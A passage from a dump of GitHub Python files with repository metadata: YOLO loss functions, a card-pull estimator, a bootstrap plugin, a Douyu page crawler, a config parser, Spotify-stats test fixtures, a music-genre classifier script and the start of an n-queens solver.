tcls = pos * paddle.cast(\n tcls > 0., dtype=tcls.dtype) + neg * paddle.cast(\n tcls <= 0., dtype=tcls.dtype)\n\n loss_cls = F.binary_cross_entropy_with_logits(\n pcls, tcls, reduction='none')\n return loss_cls\n\n def yolov3_loss(self, p, t, gt_box, anchor, downsample, scale=1.,\n eps=1e-10):\n na = len(anchor)\n b, c, h, w = p.shape\n if self.iou_aware_loss:\n ioup, p = p[:, 0:na, :, :], p[:, na:, :, :]\n ioup = ioup.unsqueeze(-1)\n p = p.reshape((b, na, -1, h, w)).transpose((0, 1, 3, 4, 2))\n x, y = p[:, :, :, :, 0:1], p[:, :, :, :, 1:2]\n w, h = p[:, :, :, :, 2:3], p[:, :, :, :, 3:4]\n obj, pcls = p[:, :, :, :, 4:5], p[:, :, :, :, 5:]\n self.distill_pairs.append([x, y, w, h, obj, pcls])\n\n t = t.transpose((0, 1, 3, 4, 2))\n tx, ty = t[:, :, :, :, 0:1], t[:, :, :, :, 1:2]\n tw, th = t[:, :, :, :, 2:3], t[:, :, :, :, 3:4]\n tscale = t[:, :, :, :, 4:5]\n tobj, tcls = t[:, :, :, :, 5:6], t[:, :, :, :, 6:]\n\n tscale_obj = tscale * tobj\n loss = dict()\n\n x = scale * F.sigmoid(x) - 0.5 * (scale - 1.)\n y = scale * F.sigmoid(y) - 0.5 * (scale - 1.)\n\n if abs(scale - 1.) < eps:\n loss_x = F.binary_cross_entropy(x, tx, reduction='none')\n loss_y = F.binary_cross_entropy(y, ty, reduction='none')\n loss_xy = tscale_obj * (loss_x + loss_y)\n else:\n loss_x = paddle.abs(x - tx)\n loss_y = paddle.abs(y - ty)\n loss_xy = tscale_obj * (loss_x + loss_y)\n\n loss_xy = loss_xy.sum([1, 2, 3, 4]).mean()\n\n loss_w = paddle.abs(w - tw)\n loss_h = paddle.abs(h - th)\n loss_wh = tscale_obj * (loss_w + loss_h)\n loss_wh = loss_wh.sum([1, 2, 3, 4]).mean()\n\n loss['loss_xy'] = loss_xy\n loss['loss_wh'] = loss_wh\n\n if self.iou_loss is not None:\n # warn: do not modify x, y, w, h in place\n box, tbox = [x, y, w, h], [tx, ty, tw, th]\n pbox = bbox_transform(box, anchor, downsample)\n gbox = bbox_transform(tbox, anchor, downsample)\n loss_iou = self.iou_loss(pbox, gbox)\n loss_iou = loss_iou * tscale_obj\n loss_iou = loss_iou.sum([1, 2, 3, 4]).mean()\n loss['loss_iou'] = loss_iou\n\n if self.iou_aware_loss is not None:\n box, tbox = [x, y, w, h], [tx, ty, tw, th]\n pbox = bbox_transform(box, anchor, downsample)\n gbox = bbox_transform(tbox, anchor, downsample)\n loss_iou_aware = self.iou_aware_loss(ioup, pbox, gbox)\n loss_iou_aware = loss_iou_aware * tobj\n loss_iou_aware = loss_iou_aware.sum([1, 2, 3, 4]).mean()\n loss['loss_iou_aware'] = loss_iou_aware\n\n box = [x, y, w, h]\n loss_obj = self.obj_loss(box, gt_box, obj, tobj, anchor, downsample)\n loss_obj = loss_obj.sum(-1).mean()\n loss['loss_obj'] = loss_obj\n loss_cls = self.cls_loss(pcls, tcls) * tobj\n loss_cls = loss_cls.sum([1, 2, 3, 4]).mean()\n loss['loss_cls'] = loss_cls\n return loss\n\n def forward(self, inputs, targets, anchors):\n np = len(inputs)\n gt_targets = [targets['target{}'.format(i)] for i in range(np)]\n gt_box = targets['gt_bbox']\n yolo_losses = dict()\n self.distill_pairs.clear()\n for x, t, anchor, downsample in zip(inputs, gt_targets, anchors,\n self.downsample):\n yolo_loss = self.yolov3_loss(x, t, gt_box, anchor, downsample,\n self.scale_x_y)\n for k, v in yolo_loss.items():\n if k in yolo_losses:\n yolo_losses[k] += v\n else:\n yolo_losses[k] = v\n\n loss = 0\n for k, v in yolo_losses.items():\n loss += v\n\n yolo_losses['loss'] = loss\n return yolo_losses\n\n\n@register\nclass YOLOv5Loss(nn.Layer):\n __shared__ = ['num_classes']\n\n def __init__(self,\n num_classes=80,\n downsample_ratios=[8, 16, 32],\n balance=[4.0, 1.0, 0.4],\n box_weight=0.05,\n obj_weight=1.0,\n cls_weght=0.5,\n bias=0.5,\n anchor_t=4.0,\n label_smooth_eps=0.):\n super(YOLOv5Loss, self).__init__()\n self.num_classes = num_classes\n self.balance = balance\n self.na = 3 # not len(anchors)\n self.gr = 1.0\n\n self.BCEcls = nn.BCEWithLogitsLoss(\n pos_weight=paddle.to_tensor([1.0]), reduction=\"mean\")\n self.BCEobj = nn.BCEWithLogitsLoss(\n pos_weight=paddle.to_tensor([1.0]), reduction=\"mean\")\n\n self.loss_weights = {\n 'box': box_weight,\n 'obj': obj_weight,\n 'cls': cls_weght,\n }\n\n eps = label_smooth_eps if label_smooth_eps > 0 else 0.\n self.cls_pos_label = 1.0 - 0.5 * eps\n self.cls_neg_label = 0.5 * eps\n\n self.downsample_ratios = downsample_ratios\n self.bias = bias\n self.off = paddle.to_tensor(\n [\n [0, 0],\n [1, 0],\n [0, 1],\n [-1, 0],\n [0, -1], # j,k,l,m\n ],\n dtype='float32') * self.bias\n self.anchor_t = anchor_t\n\n def build_targets(self, outputs, targets, anchors):\n anchors = anchors.numpy()\n gt_nums = [len(bbox) for bbox in targets['gt_bbox']]\n nt = int(sum(gt_nums))\n na = anchors.shape[1] # not len(anchors)\n tcls, tbox, indices, anch = [], [], [], []\n\n gain = np.ones(7, dtype=np.float32) # normalized to gridspace gain\n ai = np.tile(\n np.arange(\n na, dtype=np.float32).reshape(na, 1),\n [1, nt]) # same as .repeat_interleave(nt)\n\n batch_size = outputs[0].shape[0]\n gt_labels = []\n for idx in range(batch_size):\n gt_num = gt_nums[idx]\n if gt_num == 0:\n continue\n gt_bbox = targets['gt_bbox'][idx][:gt_num]\n gt_class = targets['gt_class'][idx][:gt_num] * 1.0\n img_idx = np.repeat(np.array([[idx]]), gt_num, axis=0)\n gt_labels.append(\n np.concatenate(\n (img_idx, gt_class, gt_bbox), axis=-1))\n if (len(gt_labels)):\n gt_labels = np.concatenate(gt_labels)\n else:\n gt_labels = np.zeros([0, 6])\n\n targets_labels = np.concatenate((np.tile(\n np.expand_dims(gt_labels, 0), [na, 1, 1]), ai[:, :, None]), 2)\n g = 0.5 # bias\n off = np.array(\n [\n [0, 0],\n [1, 0],\n [0, 1],\n [-1, 0],\n [0, -1], # j,k,l,m\n ],\n dtype=np.float32) * g # offsets\n\n for i in range(len(anchors)):\n anchor = np.array(anchors[i]) / self.downsample_ratios[i]\n gain[2:6] = np.array(\n outputs[i].shape, dtype=np.float32)[[3, 2, 3, 2]] # xyxy gain\n\n # Match targets_labels to\n t = targets_labels * gain\n if nt:\n # Matches\n r = t[:, :, 4:6] / anchor[:, None]\n j = np.maximum(r, 1 / r).max(2) < self.anchor_t\n t = t[j] # filter\n\n # Offsets\n gxy = t[:, 2:4] # grid xy\n gxi = gain[[2, 3]] - gxy # inverse\n j, k = ((gxy % 1 < g) & (gxy > 1)).T\n l, m = ((gxi % 1 < g) & (gxi > 1)).T\n j = np.stack((np.ones_like(j), j, k, l, m))\n t = np.tile(t, [5, 1, 1])[j]\n offsets = (np.zeros_like(gxy)[None] + off[:, None])[j]\n else:\n t = targets_labels[0]\n offsets = 0\n\n # Define\n b, c = t[:, :2].astype(np.int64).T # image, class\n gxy = t[:, 2:4] # grid xy\n gwh = t[:, 4:6] # grid wh\n gij = (gxy - offsets).astype(np.int64)\n gi, gj = gij.T # grid xy indices\n\n # Append\n a = t[:, 6].astype(np.int64) # anchor indices\n gj, gi = gj.clip(0, gain[3] - 1), gi.clip(0, gain[2] - 1)\n indices.append((paddle.to_tensor(b), paddle.to_tensor(a),\n paddle.to_tensor(\n gj, dtype=paddle.int64), paddle.to_tensor(\n gi, dtype=paddle.int64)))\n tbox.append(\n paddle.to_tensor(\n np.concatenate((gxy - gij, gwh), 1), dtype=paddle.float32))\n anch.append(paddle.to_tensor(anchor[a]))\n tcls.append(paddle.to_tensor(c))\n return tcls, tbox, indices, anch\n\n def yolov5_loss(self, pi, t_cls, t_box, t_indices, t_anchor, balance):\n loss = dict()\n b, a, gj, gi = t_indices # image, anchor, gridy, gridx\n n = b.shape[0] # number of targets\n tobj = paddle.zeros_like(pi[:, :, :, :, 4])\n loss_box = paddle.to_tensor([0.])\n loss_cls = paddle.to_tensor([0.])\n if n:\n ps = pi.gather_nd(\n paddle.concat([\n b.reshape([-1, 1]), a.reshape([-1, 1]), gj.reshape([-1, 1]),\n gi.reshape([-1, 1])\n ], 1))\n # Regression\n pxy = F.sigmoid(ps[:, :2]) * 2 - 0.5\n pwh = (F.sigmoid(ps[:, 2:4]) * 2)**2 * t_anchor\n pbox = paddle.concat((pxy, pwh), 1) # predicted box # [21, 4]\n iou = bbox_iou(pbox.T, t_box.T, x1y1x2y2=False, ciou=True)\n # iou.stop_gradient = True\n loss_box = (1.0 - iou).mean()\n\n # Objectness\n score_iou = paddle.cast(iou.detach().clip(0), tobj.dtype)\n with paddle.no_grad():\n tobj[b, a, gj, gi] = (1.0 - self.gr\n ) + self.gr * score_iou # iou ratio\n\n # Classification\n t = paddle.full_like(ps[:, 5:], self.cls_neg_label)\n t[range(n), t_cls] = self.cls_pos_label\n loss_cls = self.BCEcls(ps[:, 5:], t)\n\n obji = self.BCEobj(pi[:, :, :, :, 4], tobj) # [4, 3, 80, 80]\n\n loss_obj = obji * balance\n\n loss['loss_box'] = loss_box * self.loss_weights['box']\n loss['loss_obj'] = loss_obj * self.loss_weights['obj']\n loss['loss_cls'] = loss_cls * self.loss_weights['cls']\n return loss\n\n def forward(self, inputs, targets, anchors):\n assert len(inputs) == len(anchors)\n assert len(inputs) == len(self.downsample_ratios)\n yolo_losses = dict()\n tcls, tbox, indices, anch = self.build_targets(inputs, targets, anchors)\n\n for i, (p_det, balance) in enumerate(zip(inputs, self.balance)):\n t_cls = tcls[i]\n t_box = tbox[i]\n t_anchor = anch[i]\n t_indices = indices[i]\n\n bs, ch, h, w = p_det.shape\n pi = p_det.reshape((bs, self.na, -1, h, w)).transpose(\n (0, 1, 3, 4, 2))\n\n yolo_loss = self.yolov5_loss(pi, t_cls, t_box, t_indices, t_anchor,\n balance)\n\n for k, v in yolo_loss.items():\n if k in yolo_losses:\n yolo_losses[k] += v\n else:\n yolo_losses[k] = v\n\n loss = 0\n for k, v in yolo_losses.items():\n loss += v\n\n batch_size = inputs[0].shape[0]\n num_gpus = targets.get('num_gpus', 8)\n yolo_losses['loss'] = loss * batch_size * num_gpus\n return yolo_losses\n","repo_name":"nemonameless/PaddleDetection_YOLOv5","sub_path":"ppdet/modeling/losses/yolo_loss.py","file_name":"yolo_loss.py","file_ext":"py","file_size_in_byte":14838,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"72"} +{"seq_id":"17634326410","text":"from typing import List, Optional\n\nimport numpy as np\nfrom algo_ops.ops.text import TextOp\n\nfrom card_recognizer.classifier.core.card_frame_run import CardFrameRun\nfrom card_recognizer.classifier.core.card_prediction_result import (\n CardPredictionResult,\n CardPrediction,\n)\nfrom card_recognizer.pulls_estimator.plots import plot_pull_stats\n\n\nclass PullsEstimator(TextOp):\n \"\"\"\n The PullsEstimator identifies the likely card pulls in a time series of image frames. It takes as input a time\n series of predictions of cards for frames in a video. The time series is represented as a CardPredictionResult\n object. The PullsEstimator filters out likely false positives in the time series based on frequencies of card\n detection and their confidence scores. The PullsEstimator then chooses the top-scoring cards based on the\n selection score: selection_score = card_frequency * confidence_score. The PullsEstimator returns the estimated\n pulled cards in the video.\n \"\"\"\n\n def __init__(\n self,\n min_run_length: Optional[int] = 5,\n min_run_conf: Optional[float] = 0.1,\n run_tol: Optional[int] = 10,\n num_cards_to_select: Optional[int] = 10,\n output_figs_path: Optional[str] = None,\n figs_paging: bool = False,\n ):\n \"\"\"\n param min_run_length: The minimum length of a run to keep it as a card run detection (if None,\n turn off filter and allow all runs to pass)\n param min_run_conf: The minimum confidence score of a run to keep it as a card run detection (if None,\n turn off filter and allow all runs to pass)\n param run_tol: The number of consecutive noisy frames to tolerate within a run\n param num_cards_to_select; The number of card pulls to estimate (if None, there is no limit)\n param output_figs_path: Path to where output figs should go\n figs_paging: Whether figs should be paged\n \"\"\"\n\n # set params\n super().__init__(func=self.estimate_pull_series)\n self.min_run_length: Optional[int] = min_run_length\n self.min_run_conf: Optional[float] = min_run_conf\n self.run_tol: Optional[int] = run_tol\n self.num_cards_to_select = num_cards_to_select\n self.output_fig_path = output_figs_path\n self.figs_paging = figs_paging\n\n # define input/output types\n self.input: Optional[CardPredictionResult] = None\n self.output: Optional[CardPredictionResult] = None\n\n def vis_input(self) -> None:\n \"\"\"\n Visualize input statistics.\n \"\"\"\n if self.input is None:\n raise ValueError(\"There is no input to be visualized.\")\n plot_pull_stats(\n card_prediction_result=self.input,\n output_fig_path=self.output_fig_path,\n prefix=\"input\",\n figs_paging=self.figs_paging,\n )\n\n def vis(self) -> None:\n \"\"\"\n Visualize output statistics.\n \"\"\"\n if self.output is None:\n raise ValueError(\"There is no output to be visualized.\")\n self.vis_input()\n plot_pull_stats(\n card_prediction_result=self.output,\n output_fig_path=self.output_fig_path,\n prefix=\"output\",\n figs_paging=self.figs_paging,\n )\n\n def _apply_filter(self, runs: List[CardFrameRun]) -> List[CardFrameRun]:\n \"\"\"\n Filters a list of card runs on run length and max confidence score.\n\n param runs: The input list of card runs\n\n Returns:\n keep: List of kept runs\n \"\"\"\n keep: List[CardFrameRun] = list()\n for run in runs:\n if (self.min_run_length is not None and len(run) < self.min_run_length) or (\n self.min_run_conf is not None\n and run.max_confidence_score < self.min_run_conf\n ):\n continue\n else:\n keep.append(run)\n return keep\n\n def _apply_selection(self, runs: List[CardFrameRun]) -> List[CardFrameRun]:\n \"\"\"\n Chooses a number of top runs based on selection score.\n\n param runs: List of candidate runs\n\n Returns:\n selected_runs: List of selected runs\n \"\"\"\n\n # if num_cards_to_select is None, return all runs\n if self.num_cards_to_select is None:\n return runs\n\n # perform selection based on selection scores\n sorted_card_indices = np.argsort([-1.0 * run.selection_score for run in runs])\n selected_runs: List[CardFrameRun] = [\n runs[index] for index in sorted_card_indices[0 : self.num_cards_to_select]\n ]\n return selected_runs\n\n @staticmethod\n def _make_result(\n runs: List[CardFrameRun], frame_card_prediction: CardPredictionResult\n ) -> CardPredictionResult:\n \"\"\"\n Packages runs to CardPredictionResult.\n\n params runs: List of runs\n param frame_card_prediction: Previous CardPredictionResult object\n\n Returns:\n New card prediction result with just specified runs kept\n \"\"\"\n\n # find kept predictions from selected runs\n kept_predictions: List[CardPrediction] = list()\n for run in runs:\n kept_predictions.extend(\n frame_card_prediction.query_card_prediction(\n interval=run.interval, card_index=run.card_index\n )\n )\n kept_predictions.sort()\n\n # create return object\n rtn = CardPredictionResult(\n predictions=kept_predictions, num_frames=frame_card_prediction.num_frames\n )\n rtn.input_path = frame_card_prediction.input_path\n rtn.reference_set = frame_card_prediction.reference_set\n return rtn\n\n def estimate_pull_series(\n self,\n frame_card_predictions: CardPredictionResult,\n ) -> CardPredictionResult:\n \"\"\"\n Estimates series of pulled cards in a stream of card detections in images.\n\n param frame_card_predictions: CardPredictionResult object containing card frame predictions\n\n Returns:\n Filtered CardPredictionResult with frames removed for filtered-out (false positive) cards\n \"\"\"\n\n # apply filter\n kept_runs: List[CardFrameRun] = self._apply_filter(\n runs=frame_card_predictions.runs\n )\n\n # select cards based on selection score\n selected_runs: List[CardFrameRun] = self._apply_selection(runs=kept_runs)\n\n # create output CardPredictionResult object\n return self._make_result(\n runs=selected_runs, frame_card_prediction=frame_card_predictions\n )\n","repo_name":"prateekt/pokemon-card-recognizer","sub_path":"card_recognizer/pulls_estimator/pulls_estimator.py","file_name":"pulls_estimator.py","file_ext":"py","file_size_in_byte":6669,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"36788167528","text":"#!/usr/bin/env python\n\n__author__ = 'Michael Meisinger'\n\nfrom pyon.core.governance import get_system_actor\nfrom ion.core.bootstrap_process import BootstrapPlugin, AbortBootstrap\nfrom pyon.public import IonObject, RT, log, ResourceQuery, PRED\nfrom pyon.util.containers import get_safe\n\nfrom interface.objects import ActorIdentity, Org\n\n\nclass BootstrapCore(BootstrapPlugin):\n \"\"\"\n Bootstrap plugin for core system resources.\n No service dependency\n \"\"\"\n\n def on_initial_bootstrap(self, process, config, **kwargs):\n # Detect if system has been started before by the presence of the ION system actor\n system_actor = get_system_actor()\n if system_actor:\n raise AbortBootstrap(\"System already initialized. Start with bootmode=restart or force_clean (-fc)!\")\n\n # Create ION actor\n actor_name = get_safe(config, \"system.system_actor\", \"ionsystem\")\n sys_actor = ActorIdentity(name=actor_name, description=\"ION System Agent\")\n process.container.resource_registry.create(sys_actor)\n\n def on_restart(self, process, config, **kwargs):\n # Delete leftover Service and associated Process resources\n svc_ids, _ = process.container.resource_registry.find_resources(restype=RT.Service, id_only=True)\n\n if svc_ids:\n rq = ResourceQuery()\n rq.set_filter(rq.filter_type(RT.Process),\n rq.filter_associated_from_subject(svc_ids, predicate=PRED.hasProcess))\n proc_ids = process.container.resource_registry.find_resources_ext(query=rq.get_query(), id_only=True)\n\n log.info(\"Deleting %s Service resources\", len(svc_ids))\n process.container.resource_registry.rr_store.delete_mult(svc_ids)\n\n if proc_ids:\n log.info(\"Deleting %s Procvess resources\", len(proc_ids))\n process.container.resource_registry.rr_store.delete_mult(proc_ids)\n","repo_name":"scionrep/scioncc","sub_path":"src/ion/process/bootstrap/plugins/bootstrap_core.py","file_name":"bootstrap_core.py","file_ext":"py","file_size_in_byte":1923,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"74011944234","text":"from requests import get\nfrom Settings import HEADERS\nimport json\nfrom data_cleaning.Extractor import Extractor\nfrom data_cleaning.content_clean import clean_content\n\nif __name__ == '__main__':\n urls = []\n for i in range(5):\n response = get(\"https://www.douyu.com/japi/weblist/apinc/rec/list?uid=8b6321ddbef037034b351cab00081501&num=20\", headers=HEADERS)\n data_json = json.loads(response.text)\n data_url = (data_json['data'])\n for data in data_url:\n urls.append(f\"https://douyu.com/{data['roomId']}\")\n print(f\"共爬取{len(urls)}条房间\")\n try:\n for i in range(len(urls)):\n ex = Extractor(threshold=20)\n html = get(urls[i], headers=HEADERS).text\n content = ex.filter_tags(html)\n data = clean_content(ex.getText(content))\n with open(f'E:/c++/毕业设计开发日志/06.文本数据集/娱乐/直播/{i}.txt', 'w', encoding='utf-8') as txtfile:\n txtfile.write(data)\n print(f\"第{i}个直播间处理完毕\")\n print(f'共{i}个直播间处理完毕')\n except Exception as e:\n print(e)\n\n","repo_name":"ulyyyyyy/GraduationProject_ghh","sub_path":"web_data_crawler/douyu_crawler.py","file_name":"douyu_crawler.py","file_ext":"py","file_size_in_byte":1143,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"42281010424","text":"def parse_data_config(path):\n '''\n 解析数据配置文件\n '''\n options = dict() # 字典\n options['gpus'] = '0,1,2,3,4'\n options['num_workers'] = '10'\n with open(path, 'r') as fp:\n lines = fp.readlines()\n for line in lines:\n line = line.strip() # 去掉空格键\n if line == '' or line.startswith('#'): # 跳过空行和注释行\n continue\n key, value = line.split('=') # 取出每行的键值对\n options[key.strip()] = value.strip() # 存储在字典中\n return options\n\ndef parse_model_config(path):\n '''\n 解析cfg网络配置文件,返回模型定义\n '''\n file = open(path, 'r')\n lines = file.read().split('\\n') # 逐行读取,返回列表\n lines = [x for x in lines if x and not x.startswith('#')] # 去掉空行和注释行\n lines = [x.rstrip().lstrip() for x in lines] # 去掉左右两边空格\n module_defs = [] # cfg文件内容以[]划分为各个块block,每个block对应一种操作例如卷积,将每个block读入存放到列表中\n for line in lines:\n if line.startswith('['): # 遇到 [ 说明开始一个新的block\n module_defs.append({}) # 以字典的形式存储各个block的参数\n module_defs[-1]['type'] = line[1:-1].rstrip() # 存储block的type,例如卷积convolutional\n if module_defs[-1]['type'] == 'convolutional': # 不是每个convolutional block都有batch_normalize参数,为了后面方便,给每个convolutional默认有batch_normalize参数且值为0\n module_defs[-1]['batch_normalize'] = 0\n else:\n key, value = line.split('=') # 以等号划分开 convolutional有batch_normalize的话会更新\n value = value.strip()\n module_defs[-1][key.rstrip()] = value.lstrip()\n return module_defs","repo_name":"ziyaxuanyi/my-yolo","sub_path":"utils/parse_config.py","file_name":"parse_config.py","file_ext":"py","file_size_in_byte":1880,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"73118067112","text":"import json\nimport os\nfrom datetime import datetime, timedelta\nfrom pathlib import Path\n\nimport jinja2\nimport pytest\nimport yaml\n\nfrom statify import (\n config,\n database_client,\n spotify_client\n)\nfrom statify import webserver\nfrom statify.webserver import webserver as statify_webserver\n\n\nTEMPLATES = {}\n\n\ndef load_templates():\n \"\"\"\n Templates need to be pre-loaded, since pyfakefs breaks dynamic loading\n (templates don't exist in the fake filesystem). There surely is a better way\n to handle this.\n \"\"\"\n app = statify_webserver.app\n for template in (Path(webserver.__file__).parent / 'templates').iterdir():\n TEMPLATES[template.name] = app.jinja_loader.get_source(\n app.jinja_env,\n template.name,\n )\n\n\nload_templates()\n\n\n@pytest.fixture\ndef app():\n app = statify_webserver.app\n app.jinja_loader = jinja2.FunctionLoader(lambda name: TEMPLATES[name])\n return app\n\n\n@pytest.fixture\ndef statify_directory(fs):\n os.makedirs(str(config.STATIFY_PATH), exist_ok=True)\n\n\n@pytest.fixture\ndef statify_config(fs):\n os.makedirs(str(config.CONFIG_PATH.parent), exist_ok=True)\n with open(str(config.CONFIG_PATH), 'w') as config_file:\n yaml.dump(\n {\n 'spotify_app': {\n 'client_id': 'test_client_id',\n 'client_secret': 'test_client_secret',\n },\n 'throttling': 0,\n },\n config_file\n )\n\n\n@pytest.fixture\ndef cached_token(fs, statify_directory):\n with open(str(spotify_client.OAUTH_TOKENS_PATH), 'w') as token_file:\n json.dump(\n {\n 'token_type': 'Bearer',\n 'expires_in': 3600,\n 'expires_at': (datetime.utcnow()+timedelta(days=42)).timestamp(),\n 'scope': 'playlist-read-private user-read-recently-played',\n 'refresh_token': 'toto',\n 'access_token': 'toto',\n },\n token_file\n )\n\n\n@pytest.fixture\ndef in_memory_database(mocker, statify_directory):\n database = database_client.StatifyDatabase(':memory:')\n mocker.patch(\n 'statify.statify.database_client.StatifyDatabase',\n return_value=database,\n )\n yield database\n database.close()\n\n\n@pytest.fixture\ndef sql_spy(mocker):\n backup = database_client.StatifyDatabase._sql\n database_client.StatifyDatabase._sql = mocker.MagicMock()\n yield database_client.StatifyDatabase._sql\n database_client.StatifyDatabase._sql = backup\n","repo_name":"foobuzz/statify","sub_path":"tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":2541,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"72"} +{"seq_id":"6476349064","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[ ]:\n\nfrom collections import Counter\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.model_selection import train_test_split\nfrom sklearn import preprocessing\nfrom sklearn.decomposition import PCA\nfrom sklearn import manifold\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.metrics import confusion_matrix\nfrom xgboost import XGBClassifier\nfrom xgboost import plot_tree, plot_importance\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.svm import SVC\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.neural_network import MLPClassifier\n\n# In[ ]:\n\n\ndata_3_train = pd.read_csv('D:\\\\79886\\\\Documents\\\\HKUST\\\\Courses\\\\5001 Foundations of Data Analytics\\\\group_project\\\\ml\\\\features_3_sec_train.csv')\ndata_3_train\n\n\n# In[ ]:\n\n\ndata_3_1 = data_3_train.iloc[:,2:]\ndata_3_1.shape\n\n\n# In[ ]:\n\n\ndata_3_1.groupby(data_3_1['label']).describe()\n\n\n# In[ ]:\n\n\nY_3_train = data_3_1['label']\n# 将除了label外的特征作为X\nX_3_train = data_3_1.iloc[:,:-1]\n# 将label列的文字转化成数字\nmap_label = {\"blues\":0, \"classical\":1, \"country\":2, \"disco\":3, \"hiphop\":4, \"jazz\":5, \"metal\":6, \"pop\":7, \"reggae\":8, \"rock\":9}\n# map函数进行映射,对label中的每一个元素进行map_label中的替换\nY_3_train = Y_3_train.map(lambda x: map_label[x])\nclasses=[\"blues\", \"classical\", \"country\", \"disco\", \"hiphop\", \"jazz\", \"metal\", \"pop\", \"reggae\", \"rock\"]\n# 查看训练集中的各类别分布,确定样本是否不均衡\nprint(Y_3_train.value_counts())\n\n\n# In[ ]:\n\n\ndata_3_test = pd.read_csv('D:\\\\79886\\\\Documents\\\\HKUST\\\\Courses\\\\5001 Foundations of Data Analytics\\\\group_project\\\\ml\\\\features_3_sec_test.csv')\ndata_3_test\n\n\n# In[ ]:\n\n\ndata_3_2 = data_3_test.iloc[:,2:]\ndata_3_2.shape\n\n\n# In[ ]:\n\n\ndata_3_2.groupby(data_3_2['label']).describe()\n\n\n# In[ ]:\n\n\nY_3_test = data_3_2['label']\n# 将除了label外的特征作为X\nX_3_test = data_3_2.iloc[:,:-1]\n# 将label列的文字转化成数字\nmap_label = {\"blues\":0, \"classical\":1, \"country\":2, \"disco\":3, \"hiphop\":4, \"jazz\":5, \"metal\":6, \"pop\":7, \"reggae\":8, \"rock\":9}\n# map函数进行映射,对label中的每一个元素进行map_label中的替换\nY_3_test = Y_3_test.map(lambda x: map_label[x])\nclasses=[\"blues\", \"classical\", \"country\", \"disco\", \"hiphop\", \"jazz\", \"metal\", \"pop\", \"reggae\", \"rock\"]\n# 查看训练集中的各类别分布,确定样本是否不均衡\nprint(Y_3_test.value_counts())\n\n# In[15]:\n\n\nscaler = preprocessing.StandardScaler().fit(X_3_train)\n\n# if normalization\nX_3_train = scaler.transform(X_3_train)\nX_3_test = scaler.transform(X_3_test)\n\n\n# In[21]:\n\n# gs = XGBClassifier(n_estimators=500,learning_rate=0.1,max_depth=5).fit(X_3_train,Y_3_train) #0.58\n# gs = SVC().fit(X_3_train,Y_3_train) #0.59\ngs = LogisticRegression(max_iter=1000).fit(X_3_train,Y_3_train) #0.6\n# gs = MLPClassifier(alpha=1e-5, hidden_layer_sizes=(256,128,64,10), max_iter=400, learning_rate_init=0.005).fit(X_3_train,Y_3_train) #0.568\ngs.score(X_3_train,Y_3_train),gs.score(X_3_test,Y_3_test)\n\n# In[ ]:\n\npred = gs.predict(X_3_test)\nprint(pred)\n\n# In[ ]:\n\ndf = pd.DataFrame({'name': data_3_test['filename'], 'label': Y_3_test, 'pred':pred})\ndf.to_csv('D:\\\\79886\\\\Documents\\\\HKUST\\\\Courses\\\\5001 Foundations of Data Analytics\\\\group_project\\\\ml\\\\pred.csv')\n\n\n# In[ ]:\nfrom sklearn import metrics\nmetrics.accuracy_score(Y_3_test, pred)\n\n# In[ ]:\n\nc = [0]*250\nlp = [0]*250\nl = [0]*250\nfor i in range(250):\n c[i] = Counter(df.loc[10*i:10*i+10,'pred'])\n lp[i] = c[i].most_common(1)\n l[i] = lp[i][0][0]\n\n\n# In[ ]:\n\nt = [0]*250\nfor i in range(250):\n t[i] = df.loc[10*i,'label']\n \npred30 = pd.DataFrame({'label': t, 'pred':l})\n\n# In[ ]:\n\nmetrics.accuracy_score(pred30['label'], pred30['pred'])\n\nk = 0\nfor i in range(250):\n if pred30.loc[i,'label'] == pred30.loc[i, 'pred']:\n k+=1\n \nacu = k/250\nprint(acu)\n\n# In[22]:\n\n# 概率求和\np = [0]*250\nprob = gs.predict_proba(X_3_test)\nfor i in range(250):\n for j in range(10):\n p[i] += prob[10*i+j]\n\n\n# In[22]:\n\np_max = [0]*250\nfor i in range(250):\n p[i]=p[i].tolist()\n p_max[i] = p[i].index(max(p[i]))\n\n# In[22]:\n\nprob30 = pd.DataFrame({'label': t, 'pred':p_max})\nmetrics.accuracy_score(prob30['label'], prob30['pred'])\n# lr 0.592 \n# xgboost 0.576\n","repo_name":"yetirita/Music-Genre-Classification-Recommendation","sub_path":"xgboost_test.py","file_name":"xgboost_test.py","file_ext":"py","file_size_in_byte":4540,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"28521504229","text":"from django.urls import path\n\nfrom .views import index, profile, RegisterView\n\napp_name = 'users'\n\n\nurlpatterns = [\n path('', index, name=\"index\"),\n path('profile/', profile, name='profile'),\n path('register/', RegisterView.as_view(), name='register'),\n]\n","repo_name":"hunterallencodes/booksort","sub_path":"users/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25928037659","text":"#Hill climbing algorithm\n\nimport random\nimport copy\nimport globals as gl\nfrom memory_profiler import profile\n\n# State class\nclass state:\n def __init__ (self,queens,n):\n self.queens = queens\n self.n = n\n self.matrix = self.matrix_generation() # Calls the function that generates the matrix\n self.columns = self.columns() # Calls the functions that keep track of the amount of \n self.diagonals = self.diagonals() # queens in each column and diagonal\n \n def matrix_generation(self): # Generating the state matrix\n matrix = []\n for x in range(0,n):\n matrix.append([0]*n)\n for q in queens:\n matrix[q[0]][q[1]] = 1\n return matrix\n \n def columns(self): # Function that stores the amount of queens in each column\n columns = [0]*n\n for q in queens:\n columns[q[1]] += 1\n return columns\n \n def 